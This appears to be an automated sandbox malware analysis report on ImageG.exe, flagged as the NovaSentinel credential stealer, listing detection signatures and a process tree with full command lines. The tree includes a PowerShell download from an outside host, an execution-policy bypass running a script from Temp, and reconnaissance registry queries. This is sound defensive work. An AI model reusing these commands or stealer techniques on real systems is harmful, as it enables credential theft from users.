Windows Analysis Report
ImageG.exe

Overview

General Information

Sample name: ImageG.exe
Analysis ID: 1639532
MD5: 689a7bcc7adad07a5c755e294889cdf5
SHA1: 96f07c4dfe98a4686bf8e2dd24b3037a8f92fcbd
SHA256: 0d19a2454600a853532a0b93bad70831dfe6080b3142f87e4a22340931c819fa

Detection

NovaSentinel
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected NovaSentinel
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Drops PE files to the startup folder
Drops large PE files
Found suspicious ZIP file
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Overwrites Mozilla Firefox settings
Performs DNS queries to domains with low reputation
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: PowerShell DownloadFile
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal communication platform credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Console CodePage Lookup Via CHCP
Sigma detected: Enumeration for 3rd Party Creds From CLI
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: PowerShell Web Download
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Too many similar processes found
Tries to detect if online games are installed (MineCraft, World Of Warcraft etc)
Uses 32bit PE files
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64native
  • ImageG.exe (PID: 7896 cmdline: "C:\Users\user\Desktop\ImageG.exe" MD5: 689A7BCC7ADAD07A5C755E294889CDF5)
    • ImageG.exe (PID: 5920 cmdline: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe MD5: B52FFEF8C47BD8ACCF7002418A029ED7)
      • dllhost.exe (PID: 8116 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • cmd.exe (PID: 480 cmdline: C:\Windows\system32\cmd.exe /d /s /c "chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • chcp.com (PID: 4988 cmdline: chcp MD5: CA9A549C17932F9CAA154B5528EBD8D4)
      • cmd.exe (PID: 5912 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=7896 get ExecutablePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • WMIC.exe (PID: 7044 cmdline: wmic process where processid=7896 get ExecutablePath MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
      • ImageG.exe (PID: 6836 cmdline: "C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\desenamoreis" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1696 --field-trial-handle=1704,i,16015974932036603911,12011319821735698167,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: B52FFEF8C47BD8ACCF7002418A029ED7)
      • cmd.exe (PID: 7348 cmdline: C:\Windows\system32\cmd.exe /d /s /c "NET SESSION" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • net.exe (PID: 1872 cmdline: NET SESSION MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 784 cmdline: C:\Windows\system32\net1 SESSION MD5: BA0BCCC6029FBBE6D8B41197F252742F)
      • cmd.exe (PID: 4416 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • powershell.exe (PID: 5600 cmdline: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 4324 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 2608 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 7444 cmdline: C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 7312 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 1144 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 6160 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 4596 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 4280 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 4452 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 7976 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 2820 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 8116 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 1936 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 1356 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 8292 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 8420 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 9048 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • powershell.exe (PID: 9116 cmdline: powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • ImageG.exe (PID: 2672 cmdline: "C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\desenamoreis" --mojo-platform-channel-handle=2424 --field-trial-handle=1704,i,16015974932036603911,12011319821735698167,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: B52FFEF8C47BD8ACCF7002418A029ED7)
      • cmd.exe (PID: 9292 cmdline: C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • findstr.exe (PID: 9400 cmdline: findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      • cmd.exe (PID: 9444 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 9500 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 9520 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 9616 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 9528 cmdline: C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 9648 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 9664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • Conhost.exe (PID: 9996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 9656 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 9704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 9696 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 9788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 9800 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 9856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 9872 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 9960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 9968 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 10104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 10128 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 10232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 5052 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 5528 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 9260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 7724 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 8776 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 8980 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 8784 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 6536 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 7420 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 2500 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 6880 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 1592 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 8880 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • Conhost.exe (PID: 2908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 8908 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 8220 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 4492 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 1432 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8692 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 1936 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 4528 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HomeBusiness2019Retail - en-us"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 2328 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HomeBusiness2019Retail - en-us" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 3124 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 1144 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 9356 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 9388 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 9352 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 9480 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 9556 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 9604 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 9524 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
